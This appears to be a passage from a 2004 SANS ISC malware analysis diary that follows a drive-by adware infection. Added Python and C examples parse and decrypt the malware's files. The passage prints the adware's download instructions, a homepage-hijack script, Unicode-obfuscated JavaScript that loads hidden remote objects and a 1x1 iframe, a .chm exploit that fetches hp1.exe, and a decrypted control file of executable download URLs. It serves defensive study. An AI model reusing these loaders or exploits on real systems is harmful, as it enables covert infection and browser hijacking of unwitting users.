So, what's the upshot of this whole mess? Well, Joe has had five new software packages installed onto his machine, redirecting his browsing, his searching, and his online purchases to suit the desires of the (no-doubt ;-) fine, upstanding people at ATPartners. His Internet browsing will now be "Simple, Exciting, and Personal" (ezula), he’ll always know that "The Best Downloads are Free" (abetterinternet), his computer will show him the "Smart way to put money in your pocket" (TopRebates) and he needn’t worry about adware/spyware any more because Virtual Bouncer has been installed to... uh... bounce it (Spyware Labs). Oh, and his online purchases will earn money for... uh... um.... someone. (SAHAgent). Joe should be so very, very happy.
But did you happen to notice THIS section in the text-file o' instructions that the ATPartners.dll downloaded?
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt
Next time around, we’re going to download a DIFFERENT set of "configuration" instructions:
[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.f1organizer.com
Object2=/F1/objects/ezbdlLs.dll
InstallName2=bdlds.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4Freeze.htm

Server3=www.f1organizer.com
Object3=/F1/objects/W2020Setup.dll
InstallName3=W2020Setup.dll
RepURL3=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server4=www.f1organizer.com
Object4=/F1/objects/MyDailyHoroscope.dll
InstallName4=MyDailyHoroscope.dll
RepURL4=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm

Server-6=www.f1organizer.com
Object-6=/F1/objects/MoreResultsSetup.dll
InstallName-6=MoreResultsSetup.dll
RepURL-6=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_Cls.htm

Server-3=www.f1organizer.com
Object-3=/F1/objects/KVIF_11.dll
InstallName-3=KVIF_11.dll
RepURL-3=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_KVI.htm
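An added Python example (not the diary's or this site's code) that parses these instruction files the way an analyst would to enumerate what ATPartners.dll is told to fetch and install. The sample config is a constructed, shortened mix of the two files quoted above (same sections and key names, fewer entries); the parser groups the UpdateList keys by numeric suffix so the negatively numbered entries (Server-4, Server-6, Server-3) are not skipped.

```python
import configparser
import re

# Constructed sample: a shortened mix of the two Cmd4F1_fr03t*.txt files quoted
# in the diary (same sections and key names, fewer entries).
SAMPLE_CONFIG = r"""[NextConfigFile]
Server=www.f1organizer.com
Object=/F1/audit/DMOnewSB/Cmd4F1_fr03t_Upd3.txt

[AddF1]
Folder=AT-Games
Link=http://www.gamehouse.com/affiliates/template.jsp?AID=2226
Name=Gamehouse Games

[AddF4]
Folder=..\\Desktop\\
Link=http://www.007arcadegames.com
Name=007arcadegames.com
IconFile=http://www.007arcadegames.com/007.ico
IconIndex=0

[UpdateList]
Server1=www.f1organizer.com
Object1=/F1/objects/msbb693.dll
InstallName1=msbb321.dll
RepURL1=http://www.f1organizer.com/F1/audit/Ack/Ack4F1_nCase321.htm

Server2=www.AddictiveTechnologies.net
Object2=/LoadShare/SplWbr.dll
InstallName2=SplWbr.dll
RepURL2=http://www.f1organizer.com/F1/audit/Ack/Ack4SB2.htm

Server-4=www.f1organizer.com
Object-4=/F1/objects/ezStD.dll
InstallName-4=ezStub3.dll
RepURL-4=http://www.f1organizer.com/F1/audit/Ack/Syn4F1_eZula.htm
"""

# ServerN / ObjectN / InstallNameN / RepURLN, where N may be negative.
KEY_RE = re.compile(r"^(server|object|installname|repurl)(-?\d+)$")


def load_config(text):
    """The files are plain INI; disable interpolation so '%' in URLs is safe."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    return cfg


def next_config_url(cfg):
    """Where the DLL is told to fetch its next set of instructions."""
    sec = cfg["NextConfigFile"]
    return "http://" + sec["Server"] + sec["Object"]


def shortcuts(cfg):
    """[AddFn] sections: links dropped into a Favorites folder or the Desktop."""
    out = []
    for name in cfg.sections():
        if name.lower().startswith("addf"):
            s = cfg[name]
            out.append({"folder": s.get("Folder"), "name": s.get("Name"),
                        "link": s.get("Link"), "icon": s.get("IconFile")})
    return out


def update_list(cfg):
    """Group the [UpdateList] keys by their numeric suffix. Iterating 1..N
    would silently skip the Server-4 / Server-6 / Server-3 entries."""
    groups = {}
    for key, value in cfg["UpdateList"].items():
        m = KEY_RE.match(key)  # configparser lower-cases keys for us
        if m:
            groups.setdefault(m.group(2), {})[m.group(1)] = value
    out = []
    for suffix in sorted(groups, key=int):
        g = groups[suffix]
        if "server" in g and "object" in g:
            out.append({"id": int(suffix),
                        "url": "http://" + g["server"] + g["object"],
                        "install_as": g.get("installname"),
                        "report_to": g.get("repurl")})
    return out


if __name__ == "__main__":
    cfg = load_config(SAMPLE_CONFIG)
    print("next config:", next_config_url(cfg))
    for s in shortcuts(cfg):
        print("shortcut:", s)
    for u in update_list(cfg):
        print("download:", u)
```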
Just looking at that list makes me tired. (And the name "ezStD" makes me laugh… For those non-English speakers out there, STD is an acronym for "Sexually Transmitted Disease" :-) I could slog down through the whole sorry mess, and perhaps I will if there is enough interest, but for now let's take a look at another area where Joe is no longer the 0wner of his P.C.: his homepage.
Joe's homepage was changed in the initial "drive-by" to be "http://default-homepage-network.com/start.cgi?new-hkcu". The next time that Joe fires up IE, here’s what he gets (suitably edited to remove superfluous crud):
<html><head>
<title>Default Homepage Network</title>
</head>
<body>
[script language=javascript]
<!--
var agt=navigator.userAgent.toLowerCase();
var is_ie = (agt.indexOf("msie") != -1);
var is_aol = (agt.indexOf("aol") != -1);

if (!is_aol) {
self.moveTo(0,0);
self.resizeTo(screen.availWidth,screen.availHeight);
}
location.href="http://default-homepage-network.com/newspynotice.html"
if (!is_aol) {
var expdate = new Date((new Date()).getTime() + 600000);
if (document.cookie.indexOf("delayed") == -1) {
document.cookie=
"delayed=general; expires=" + expdate.toGMTString() + "; path=/;";
splashWin2 = window.open("",'y','fullscreen=1,toolbar=0,location=0,\
directories=0,status=0,menubar=0,scrollbars=0,resizable=0');
splashWin2.blur();
window.focus();
splashWin2.resizeTo(10,10);
splashWin2.moveTo(5000,5000);
splashWin2.location="http://object.passthison.com/aff/delayed/";
window.focus();
}
}
//-->
[/script]</body>
The referenced file, "newspynotice.html," is another rather interesting little gem. It displays a big red stop sign, and explains that poor Joe’s computer may be infected with spyware. Has Joe noticed that his home page has been changed? (Well, duh!) Has his computer been acting "wierd" lately? (Why can’t these malware clowns spell?) Is the Internet "running slow or crashing?" If so, Joe simply needs to click on a link on the page and his "computer will be back to normal and secure again in just a few minutes." Oh, joy... oh, joy. But, hidden within the HTML of this “IMPORTANT SECURITY NOTICE!” page is a little surprise:
<!-- 1. newobj1 -->

[script type="text/javascript"]document.write('\u003c\u0073\u0063\u0072\u0069\u0070
\u0074\u0020\u006c\u0061\u006e\u0067\u0075\u0061\u0067\u0065\u003d\u006a
\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u000d\u000a
\u0076\u0061\u0072\u0020\u006f\u0050\u006f\u0070\u0075\u0070\u0020\u003d
\u0020\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u0063\u0072\u0065\u0061
\u0074\u0065\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u003b\u000d\u000a
\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0068\u006f
\u0077\u0050\u006f\u0070\u0075\u0070\u0028\u0029\u000d\u000a\u007b\u000d
\u000a\u0009\u006f\u0050\u006f\u0070\u0075\u0070\u002e\u0064\u006f\u0063
\u0075\u006d\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u002e\u0069
\u006e\u006e\u0065\u0072\u0048\u0054\u004d\u004c\u0020\u003d\u0020\u0022
\u003c\u006f\u0062\u006a\u0065\u0063\u0074\u0020\u0064\u0061\u0074\u0061
\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006f\u0062\u006a\u0065
\u0063\u0074\u002e\u0070\u0061\u0073\u0073\u0074\u0068\u0069\u0073\u006f
\u006e\u002e\u0063\u006f\u006d\u002f\u0076\u0075\u0030\u0038\u0033\u0030
\u0030\u0033\u002f\u006e\u0065\u0077\u006f\u0062\u006a\u0065\u0063\u0074
\u0031\u002e\u0063\u0067\u0069\u003e\u0022\u003b\u000d\u000a\u0009\u006f
\u0050\u006f\u0070\u0075\u0070\u002e\u0073\u0068\u006f\u0077\u0028\u0030
\u002c\u0030\u002c\u0031\u002c\u0031\u002c\u0064\u006f\u0063\u0075\u006d
\u0065\u006e\u0074\u002e\u0062\u006f\u0064\u0079\u0029\u003b\u000d\u000a
\u007d\u000d\u000a\u0073\u0068\u006f\u0077\u0050\u006f\u0070\u0075\u0070
\u0028\u0029\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070
\u0074\u003e')[/script]

<!-- 2. e1 -->

[script type="text/javascript"]document.write('\u003c\u0069\u0066\u0072\u0061\u006d
\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a
\u002f\u002f\u0036\u0039\u002e\u0035\u0030\u002e\u0031\u0033\u0039\u002e
\u0036\u0031\u002f\u0068\u0070\u0031\u002f\u0068\u0070\u0031\u002e\u0068
\u0074\u006d\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u003e\u003c\u002f\u0069
\u0066\u0072\u0061\u006d\u0065\u003e')[/script]
A little decoding gives us Part 1:
[script language=javascript]
var oPopup = window.createPopup();
function showPopup() {
oPopup.document.body.innerHTML = "<object\
data=http://object.passthison.com/vu083003/newobject1.cgi>";
oPopup.show(0,0,1,1,document.body);
}
showPopup();
[/script]
And Part 2:
[iframe src="http://69.50.139.61/hp1/hp1.htm" width=1 height=1][/iframe]
This recalls the hp2.htm file that was downloaded and installed in Part I of this epic adventure. Same site, same method, same result:
<!-- NEW Z.D.E.-D.B.D. w/ vu083003-H.P.S. (c) April 2004 SmartBot -->

[script type="text/javascript"]document.write('\u003c\u0074\u0065\u0078\u0074\u0061
\u0072\u0065\u0061\u0020\u0069\u0064\u003d\u0022\u0063\u006f\u0064\u0065
\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073
\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u003b\u0022\u003e
\u000d\u000a\u0020\u0020\u0020\u0020\u003c\u006f\u0062\u006a\u0065\u0063
\u0074\u0020\u0064\u0061\u0074\u0061\u003d\u0022\u0026\u0023\u0031\u0030
\u0039\u003b\u0073\u002d\u0069\u0074\u0073\u003a\u006d\u0068\u0074\u006d
\u006c\u003a\u0066\u0069\u006c\u0065\u003a\u002f\u002f\u0043\u003a\u005c
\u0066\u006f\u006f\u002e\u006d\u0068\u0074\u0021\u0024\u007b\u0050\u0041
\u0054\u0048\u007d\u002f\u0048\u0050\u0031\u002e\u0043\u0048\u004d\u003a
\u003a\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0074
\u0079\u0070\u0065\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0078\u002d
\u0073\u0063\u0072\u0069\u0070\u0074\u006c\u0065\u0074\u0022\u003e\u003c
\u002f\u006f\u0062\u006a\u0065\u0063\u0074\u003e\u000d\u000a\u003c\u002f
\u0074\u0065\u0078\u0074\u0061\u0072\u0065\u0061\u003e\u000d\u000a\u000d
\u000a\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006c\u0061\u006e
\u0067\u0075\u0061\u0067\u0065\u003d\u0022\u006a\u0061\u0076\u0061\u0073
\u0063\u0072\u0069\u0070\u0074\u0022\u003e\u000d\u000a\u0020\u0020\u0020
\u0020\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0077\u0072
\u0069\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u002e\u0076\u0061\u006c
\u0075\u0065\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u002f
\u005c\u0024\u007b\u0050\u0041\u0054\u0048\u007d\u002f\u0067\u002c\u006c
\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072\u0065\u0066
\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0030
\u002c\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0072
\u0065\u0066\u002e\u0069\u006e\u0064\u0065\u0078\u004f\u0066\u0028\u0027
\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0027\u0029\u0029\u0029\u0029
\u003b\u000d\u000a\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e
\u000d\u000a\u000d\u000a')[/script]
Once again, this isn’t difficult to decode, and results in:
<textarea id="code" style="display:none;">
[object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm"\
type="text/x-scriptlet"][/object]
</textarea>
[script language="javascript"]
document.write(code.value.replace(/\${PATH}/g,location.href.substring\
(0,location.href.indexOf('hp1.htm'))));
[/script]
Another .chm exploit that will eventually result in the download and execution of a file called hp1.exe.
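The two stages above were decoded by hand; the following added example (not Tom Liston's code) does the same statically: it peels nested document.write('...') layers, decodes the backslash-u escapes, and lists the iframe/object loads the final layer produces, flagging 1x1 frames and resolving the &#109;s-its: entity trick. The sample inputs are constructed from the page's own decoded stages.

```python
"""Added example (not the diary's code): statically peel the backslash-u escaped
document.write() stages shown above and list the hidden loads they produce."""
import html
import re

# JS string escapes: \uXXXX, \xXX, and one-character escapes such as \n \r \' \\
_JS_ESCAPE = re.compile(r"\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|(.))", re.S)
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "0": "\0", "b": "\b", "f": "\f"}

# document.write('...') or document.write("...") holding a single string literal
_DOC_WRITE = re.compile(r"""document\.write\(\s*(['"])(.*?)\1\s*\)""", re.S)

# <iframe ...> / <object ...> tags and the attribute that names what they load
_LOAD_TAG = re.compile(r"<(iframe|object)\b([^>]*)>", re.I | re.S)
_LOAD_ATTR = re.compile(r"""\b(?:src|data)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)
_WIDTH_1 = re.compile(r"""\bwidth\s*=\s*["']?1\b""", re.I)
_HEIGHT_1 = re.compile(r"""\bheight\s*=\s*["']?1\b""", re.I)


def decode_js_string(literal: str) -> str:
    """Turn the body of a JS string literal back into the text it denotes."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return _SIMPLE.get(m.group(3), m.group(3))
    return _JS_ESCAPE.sub(repl, literal)


def peel_document_writes(script: str, max_depth: int = 5) -> list:
    """Decode nested document.write('...') layers; returns each decoded layer in order."""
    layers, current = [], script
    for _ in range(max_depth):
        m = _DOC_WRITE.search(current)
        if not m:
            break
        current = decode_js_string(m.group(2))
        layers.append(current)
    return layers


def find_hidden_loads(markup: str) -> list:
    """List iframe/object loads; a 1x1 frame is flagged as hidden. HTML entities in
    the URL are resolved, so '&#109;s-its:' is reported as the real 'ms-its:' scheme."""
    found = []
    for tag, attrs in _LOAD_TAG.findall(markup):
        a = _LOAD_ATTR.search(attrs)
        if not a:
            continue
        url = html.unescape(next(g for g in a.groups() if g is not None))
        hidden = bool(_WIDTH_1.search(attrs) and _HEIGHT_1.search(attrs))
        found.append({"tag": tag.lower(), "url": url, "hidden": hidden})
    return found


def triage(script: str) -> dict:
    """One-call summary: number of decoded layers plus the loads in the last one."""
    layers = peel_document_writes(script)
    final = layers[-1] if layers else script
    return {"layers": len(layers), "loads": find_hidden_loads(final)}


# Constructed sample: the Part 2 iframe stage, escaped the way the page shows it
# (the page wraps the escapes across lines only for display).
IFRAME_STAGE = (
    "<script type=\"text/javascript\">document.write('"
    r"\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d"
    r"\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0036\u0039\u002e\u0035"
    r"\u0030\u002e\u0031\u0033\u0039\u002e\u0036\u0031\u002f\u0068\u0070\u0031"
    r"\u002f\u0068\u0070\u0031\u002e\u0068\u0074\u006d\u0022\u0020\u0077\u0069"
    r"\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074"
    r"\u003d\u0031\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e"
    "')</script>"
)

# Constructed sample: the decoded .chm stage from the page, as real HTML.
CHM_STAGE = r'''<textarea id="code" style="display:none;">
    <object data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/HP1.CHM::/hp1.htm" type="text/x-scriptlet"></object>
</textarea>'''

if __name__ == "__main__":
    print(triage(IFRAME_STAGE))
    print(find_hidden_loads(CHM_STAGE))
```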
Here we go again... and trust me, hp1.exe is a real piece of work.
Stay tuned for Part III...
Note: When I first started writing this up, I was completely unaware of how deeply down the rabbit hole it would take me. I honestly believed that it would only be a fairly long diary entry... then two fairly long diary entries... and now it is obvious that we’re heading into three parts at the very least. I’ll try to get Part III (and any other remaining posts) up more quickly.
------------------------------------------------------------------------

Tom Liston's Following the Bouncing Malware - Part III

Note: Most of the links in the following are not "clickable" on purpose. Think of it as a warning...

Before we begin our tumble down the rabbit hole once more, just a few brief words:

For those of you who have been following this little excursion: thank you for your patience. It’s probably difficult to completely understand the amount of time that each of these little essays takes to research and write. While I’ve been working on this particular installment, there were also the distractions of family, job, the daily “stuff” coming in at the SANS ISC, MS04-028, GDIScan, turning the ISC into the GDIScan helpdesk (sorry gang!), windsurfing the halls at NS2004 in Vegas, etc..., etc... You have my sincere apologies for the wait, as well as my fervent hope that it was worth it.

With that out of the way, why don’t we “warm up” by quickly retracing the path we’ve already trod? Perhaps now would be a good time to take a bathroom break and grab a fresh container of your favorite adult beverage, ‘cause once this caravan rolls, we ain’t stoppin’. Go on, I’ll wait...

Ready? Good. Let’s go!

In the beginning, there was Joe Average. And Joe didst buy himself a computer and conneceth it to the Internet. And with his computer, Joe did surfeth, and readeth email, and playeth many games. And Joe looked upon the Internet, and it was Good.

But while Joe did possess knowledge of the Internet Good, he did not understand that Evil too lived on the Internet. And he patcheth not.

Then one day, Joe didst unknowingly go to a Bad Place, and much Evil befell his shiny new computer.

How Evil? Very, VERY Evil:


From Follow The Bouncing Malware, Part I
(http://isc.sans.org/diary.php?date=2004-07-23):

1) Joe's homepage had been changed. It is now set to:
http://default-homepage-network.com/start.cgi?new-hkcu

2) Joe’s default search page has been set to:
http://server224.smartbotpro.net/7search/?new-hkcu

3) Search assist has been turned off.

4) "TV Media Display" has been installed on Joe's machine.

5) addictivetechnologies.net had graced Joe's machine with a file identified by AV software as Win32/TrojanDownloader.Rameh.C.

And, from Follow The Bouncing Malware, Part II
(http://isc.sans.org/diary.php?date=2004-08-23):

6) Joe’s computer, at the behest of the Addictive Technologies malware, downloaded “instructions” from F1Organizer.com

7) Following those instructions, new “Favorites” were added to Joe’s browser, and two new “gifts” (SplWbr.dll and ezbdlLs.dll) were installed on his computer.

8) The installation of SplWbr.dll dumped an “Ad Destroyer and Virtual Bouncer” from SpyWare Labs, Inc. and “TopRebates.com AutoTrack software” onto Joe’s computer.

9) The installation of ezbdlLs.dll dropped a “Utility for downloading files and upgrading software” from “ABetterInternet”, a utility to “Make Your Internet Browsing Simple, Exciting, and Personal” from the fine folks at “ezULA”, and an affiliate ID hijacker called SAHAgent onto Joe’s PC.

10) Finally, the file hp1.exe was downloaded and executed via a .CHM exploit.

That’s where we stopped last time, with my promise that the file “hp1.exe” was “a real piece of work.”

So... let’s take a look at hp1.exe.

The file hp1.exe contains 49,152 bytes o’ Visual Basic goodness (guffaw). The file’s version information claims that it was created by a company called “df”, with an internal name of “bigs104”. Launching this beastie begins bringing down a veritable rain of malware on a machine. Sit back and try to keep up as we follow the bouncing malware:

First, it contacts "http://mmm.roings.com/bundle.php?aff=bigs104" and downloads 1449 bytes of some sort of data:
388
{}{}{}wrds======ckkcha*gki+waevgl9uxwaevgl*}elkk*gki+waevgl9tx
}elkk*gki+v+w|+.9txv`w*}elkk*gki+9txwaevgl*iwj*gki+vawqhpw*ewt9ux
eqpk*waevgl*iwj*gki+vawqhpw*ewt9uxc*iwj*gki+9ux
ekhwaevgl*gki+ekhgki+waevgl9uqav}xwaevgl*ekh*gki+ekhgki+waevgl9uqav}x
ehhplasaf*gki+waevgl9uxsaf*ewo*gki+saf9uxkravpqva*gki+`+waevgl9Oa}skv`wx
gkjpajp*kravpqva*gki+`+waevgl9Oa}skv`wxiw|ih*mjbkwtega*gki+lkia+`kc9uosx
mjbkwtega*gki+lkia+`kc9uosxwaevgl*japwgeta*gki+jw+waevgl9uqav}x
japwgeta*gki+jw+waevgl9uqav}xehpermwpe*gki+saf+vawqhpw9ux
waevgl*h}gkw*gki+`abeqhp*ewt9uqav}xh}gkw*gki+waevgl*ewt9uqav}x
waevgl*aevplhmjo*jap+pvego9uxwaevgl*hkkowievp*gki+t+waevgl9up
{}{}{}doms======faewp}wtkvpeh*2|*pk9995xxxgavmeh~*gki9996xxx
`vmjoi}*gki9995
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases======`veckjfehh~9995xxxgvegow9996xx
mb$}kq$qwa$plmw$wmpa9995
{}{}{}sewers======wa|$bkv$bvaa9995xxxwa|9996xxxikva$wa|$bkv$ia9995
12
{}{}{}outers======
175
xxxxxi}a|a999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+hke`w+999i}a|a999999EHHx
JQHHxxxxxerepev999lppt>++sss*erepevvawkqvgaw*gki+`mwp+ewp[0[ii*a|a999ewp[0
[ii*a|a999ewp[0[ii*a|a999QWxAFxEQxGExCFxxxxx
a6cmra999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+Ia`meIkpkv61*a|a999Ia`meIkpkv61*
a|a999Ia`meIkpkv61*a|a999QWxGExxxxx
qjwpeh999lppt>++qtw*vkmjcw*gki+wkbp+qjwpehh*a|a999qmjwpehhav999999EHHx
JQHH
f
{}{}{}reg======
5c
xxxxxkg|5<999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+ii64*kg|999ii64*kg|999ii64*kg|
999EHHxQWxGExAF
6
{}{}{}
0
(Note: the data has been reformatted to display better in the Diary.)

Well, what the heck does all of that mean? Hmmm... it’s obviously a “generated on the fly” data file, because the file contained, in plain-text, the IP address of the NAT firewall that Joe’s machine was behind. It also appears to have been “encrypted” in some manner.

Given some time, and several pieces of paper wadded up and thrown at the cat in frustration, your intrepid author cracked the code, and wrote the following program to decrypt the data:
#include <stdio.h>

/* Undo the "encryption": every byte except '\n' has bit 2 flipped
   (add 4 when it is clear, subtract 4 when it is set), i.e. XOR 4. */
int main(int ac, char **av) {
    FILE *in, *out;
    char buffer[80], *c, val;
    int cont = 1;

    if (ac != 2) { puts("Usage: df_decrypt filename"); return 1; }
    if ((in = fopen(av[1], "r")) == NULL) { puts("Cannot open input file."); return 2; }
    if (!(out = fopen("output.txt", "w"))) { puts("Cannot open output file."); fclose(in); return 3; }
    while (cont) {
        /* long lines arrive in 79-byte pieces; that is fine, the transform is per byte */
        if (fgets(buffer, sizeof(buffer), in)) {
            c = buffer;
            while (*c) {
                if (*c != '\n') {
                    val = *c & 7;              /* the low three bits decide the direction */
                    if (val < 4) *c = *c + 4;
                    else *c = *c - 4;
                }
                c++;
            }
            fputs(buffer, out);
        } else cont = 0;
    }
    fclose(in); fclose(out);
    return 0;
}
Filling the decrypted data back into the file alongside any original data that is obviously “keywords” results in the following unencrypted file:
388
{}{}{}wrds======google.com/search=q|search.yahoo.com/search=p|
yahoo.com/r/sx/*=p|rds.yahoo.com/=p|search.msn.com/results.asp=q|
auto.search.msn.com/results.asp=q|g.msn.com/=q|aolsearch.com/aolcom/search=query|
search.aol.com/aolcom/search=query|alltheweb.com/search=q|web.ask.com/web=q|
overture.com/d/search=Keywords|content.overture.com/d/search=Keywords|
msxml.infospace.com/home/dog=qkw|infospace.com/home/dog=qkw|
search.netscape.com/ns/search=query|netscape.com/ns/search=query|
altavista.com/web/results=q|search.lycos.com/default.asp=query|
lycos.com/search.asp=query|search.earthlink.net/track=q|
search.looksmart.com/p/search=qt
{}{}{}doms====== beastysportal.6x.to===1|||cerialz.com===2|||drinkmy.com===1
{}{}{}ver======17
{}{}{}pay======yes
{}{}{}ip======aa.bbb.cc.dd (note: this was Joe’s machine’s IP address)
{}{}{}phases====== dragonballz===1|||cracks===2||if you use this site===1
{}{}{}sewers====== sex for free===1|||sex===2|||more sex for me===1
12
{}{}{}outers======
175
|||||myexe===http://bins2.media-motor.net/soft/loads/
===myexe======ALL|NULL
|||||avatar===http://www.avatarresources.com/dist/ast_4_mm.exe
===ast_4_mm.exe===ast_4_mm.exe===US|EB|AU|CA|GB
|||||e2give===http://bins2.media-motor.net/soft/MediaMotor25.exe
===MediaMotor25.exe===MediaMotor25.exe===US|CA
|||||unstal===http://ups.roings.com/soft/unstall.exe
===uinstaller======ALL|NULL
f
{}{}{}reg======
5c
|||||ocx18===http://bins2.media-motor.net/soft/mm20.ocx
===mm20.ocx===mm20.ocx===ALL|US|CA|EB
6
{}{}{}
0
After downloading this “control data” file, Joe’s computer then contacts "http://www.mastermind.com/a?l=PeAyF1sgrZYw&i=aaa.bbb.ccc.ddd" on TCP port 8010 (where aaa.bbb.ccc.ddd is Joe’s computer’s IP address) and has three lines of data returned: “2”, “US”, “0”.

This ties in with what appear to be “country codes” found within various portions of the unencrypted data file. It appears that the malware will react differently depending on the country where the infected machine is located. The script at www.mastermind.com takes the IP address and returns a country code. The other two codes (“2” and “0”) appear to control different aspects of the malware’s behavior.
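As an added example (not the diary's program), here is the same decryption in Python plus a parser for the control file's record format, with the country gating described above implemented as the assumption that "ALL" or a matching code selects a download. It also assumes the bare hex lines (388, 12, 175, f, 5c, 6, 0) are HTTP chunked transfer-coding sizes rather than payload and strips them; the sample is the encrypted "outers" and "reg" sections exactly as printed above.

```python
"""Added example (not the diary's code): decrypt the roings.com control file the
same way the C program above does (every byte except newline has bit 2 flipped,
i.e. XOR 4) and parse the download records into structured form."""
import re

# Keys whose values the page shows as encrypted; ver, pay and ip appear in clear.
ENCRYPTED_KEYS = {"wrds", "doms", "phases", "sewers", "outers", "reg"}

# Assumption: the bare hex lines (388, 12, 175, f, 5c, 6, 0) are HTTP chunked
# transfer-coding sizes, not payload, so they are dropped before parsing.
_CHUNK_SIZE_LINE = re.compile(r"^[0-9a-fA-F]{1,4}$")


def df_decrypt(text: str) -> str:
    """Same transform as the C program: +4 if bit 2 is clear, -4 if set, i.e. XOR 4."""
    return "".join(c if c == "\n" else chr(ord(c) ^ 4) for c in text)


def _split_records(value: str) -> list:
    """'|||||tag===url===a===b===CC|CC' records -> dicts (meaning of a/b unknown)."""
    out = []
    for rec in value.split("|||||"):
        if not rec:
            continue
        f = rec.split("===")
        while len(f) < 5:
            f.append("")
        out.append({"tag": f[0], "url": f[1], "name_a": f[2], "name_b": f[3],
                    "countries": [c for c in f[4].split("|") if c]})
    return out


def parse_control_file(raw: str) -> dict:
    """Return {key: value}; the download sections are expanded into record lists."""
    body = "".join(line.strip() for line in raw.splitlines()
                   if line.strip() and not _CHUNK_SIZE_LINE.match(line.strip()))
    parsed = {}
    for seg in body.split("{}{}{}"):
        if "======" not in seg:
            continue
        key, value = seg.split("======", 1)   # '======' inside values is encrypted
        if key in ENCRYPTED_KEYS:
            value = df_decrypt(value)
        parsed[key] = _split_records(value) if key in ("outers", "reg") else value
    return parsed


def applies_to(record: dict, country: str) -> bool:
    """Assumed gating: 'ALL' or the machine's country code selects the download."""
    return "ALL" in record["countries"] or country in record["countries"]


def downloads_for(parsed: dict, country: str) -> list:
    """Tags the file would fetch for a country, registration (reg) first."""
    return [r["tag"] for key in ("reg", "outers") for r in parsed.get(key, [])
            if applies_to(r, country)]


# Constructed sample: the encrypted "outers" and "reg" sections as the diary printed them.
SAMPLE = r"""{}{}{}outers======
175
xxxxxi}a|a999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+hke`w+999i}a|a999999EHHx
JQHHxxxxxerepev999lppt>++sss*erepevvawkqvgaw*gki+`mwp+ewp[0[ii*a|a999ewp[0
[ii*a|a999ewp[0[ii*a|a999QWxAFxEQxGExCFxxxxx
a6cmra999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+Ia`meIkpkv61*a|a999Ia`meIkpkv61*
a|a999Ia`meIkpkv61*a|a999QWxGExxxxx
qjwpeh999lppt>++qtw*vkmjcw*gki+wkbp+qjwpehh*a|a999qmjwpehhav999999EHHx
JQHH
f
{}{}{}reg======
5c
xxxxxkg|5<999lppt>++fmjw6*ia`me)ikpkv*jap+wkbp+ii64*kg|999ii64*kg|999ii64*kg|
999EHHxQWxGExAF
6
{}{}{}
0"""

if __name__ == "__main__":
    parsed = parse_control_file(SAMPLE)
    for rec in parsed["reg"] + parsed["outers"]:
        print(rec["tag"], rec["url"], rec["countries"])
    print("US:", downloads_for(parsed, "US"))
    print("DE:", downloads_for(parsed, "DE"))
```

For a machine reporting "US" the selection is exactly the four items the hp1.exe log line later claims (ocx18, myexe, avatar, e2give) plus the uninstaller; a non-listed country drops avatar and e2give.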

